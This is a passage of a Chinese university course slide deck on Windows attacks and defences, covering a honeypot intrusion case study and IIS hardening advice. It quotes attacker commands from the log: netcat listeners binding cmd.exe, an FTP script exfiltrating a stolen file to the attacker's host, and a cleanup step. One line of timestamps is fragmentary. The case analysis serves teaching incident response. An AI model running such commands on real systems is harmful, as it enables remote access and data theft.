《网络攻防技术与实践》课程5-Windows攻击技术及防御方法_pub.ppt

《网络攻防技术与实践》课程5-Windows攻击技术及防御方法_pub.ppt

  1. 1、本文档共104页,可阅读全部内容。
  2. 2、本文档付费后,不意味着付费购买了版权,只能用于单位或个人使用,不得用于商业用途(如:【转卖】进行直接盈利和【编辑后售卖】进行间接盈利)。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:18428362892(电话支持时间:9:00-19:00)。
* * * * * * * 问题3: 闲逛(寻找有价值信息)+炫耀 攻击者又创建了2个NetCat监听服务,并在新的6868端口连入,但奇怪的是攻击者换了个IP地址56。 21:16:41 X:2002 -> T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe 21:19:05 X:2007 -> T:80 exec (unicode) nc -l -p 6868 -e cmd1.exe 21:20:44 Y:1345 -> T:6868 incoming NC cmd.exe: ./log/06/SESSION:6868-1345 闲逛:对蜜罐主机上exploits目录体现了特别兴趣 21:25:03 Y:1345 -> T:6868 types 'echo best honeypot i've seen till now :) > rfp.txt' 21:25:49 X:2022 -> T:80 view (unicode): boot.ini and READ.NOW.hax0r 21:26:06 X:2023 -> T:80 view (unicode): READ.me.NOW.hax0r 炫耀:Web根目录创建了test.txt文件,象征性修改首页” echo . >> default.htm” 21:36:02 X:2091 -> T:80 get /test.txt, result “this can‘t be true” 21:34、8 21:37、42 21:38、10 21:38、96 21:39、 86 21:39、 21:39、3 21:42、07 21:44、3 21:46、 21:52、6 21:56、7 21:59、20 22:18 * * 问题3: Cleanup+”顺手牵羊” 21:50:27 X:2150 -> T:80 exec(unicode): 'copy c:\winnt\system32\cmd.exe cmd1.exe' 21:50:37 X:2151 -> T:80 exec(unicode): construct ftp script ftpcom ? ftpcom open X johna2k haxedj00 put c:\wiretrip\whisker.tar.gz quit ftpcom ? 21:51:29 X:2177 -> T:80 exec (unicode): 'ftp -s:ftpcom' 21:51:29 T:3158 -> X:21 ftp transfer of 'stolen' whisker, ascii 21:54:13 X:2187 -> T:80 exec (unicode) del ftpcom * * 问题4-如何防止这样的攻击? 直接防御措施:打补丁 Unicode - /technet/security/bulletin/ms00-057.asp RDS - /technet/security/Bulletin/MS02-065.mspx 进一步防御措施:IIS安全防范措施 1. 为这些漏洞打上补丁 2. 禁用用不着的RDS等服务 3. 防火墙封禁网络内部服务器发起的连接 4. 为web server在单独的文件卷上设置虚拟根目录 5. 使用NTFS文件系统,因为FAT几乎不提供安全功能 6. 使用IIS Lockdown 和 URLScan 等工具加强web server Now: Update to IIS v6.x or switch to latest Apache * * 问题5-攻击者是否警觉了他的目标是一台蜜罐主机? 是的,攻击者绝对意识到了他的目标是作为蜜罐主机的. 1. 因为他建立了一个文件,并输入了如下内容C:\>echo best honeypot i've seen till now :) > rfp.txt. 2. 因为该目标主机作为rfp的个人网站,Web服务所使用的IIS甚至没有更新rfp自己所发现的MDAC RDS安全漏洞,很容易让攻击者意识到这绝对是台诱饵。 * * * * 内容 Windows系统查点 Windows系统远程攻击 Windows系统本地攻击 案例演示:解码一次成功的NT系统破解攻击 作业4:Win2K系统被攻陷加入僵尸网络 * * 作业4: Win2K系统被攻陷并加入僵尸网络 分数: 10分 难度等级: 中级 案例分析挑战内容: ???????? 在2003年3月初,Azusa Pacific大学蜜网项目组部署了一个未打任何补丁的Windows 2000蜜罐主机,并且设置了一个空的管理员密码

您可能关注的文档

文档评论(0)

autohhh

相关文档

相关课程推荐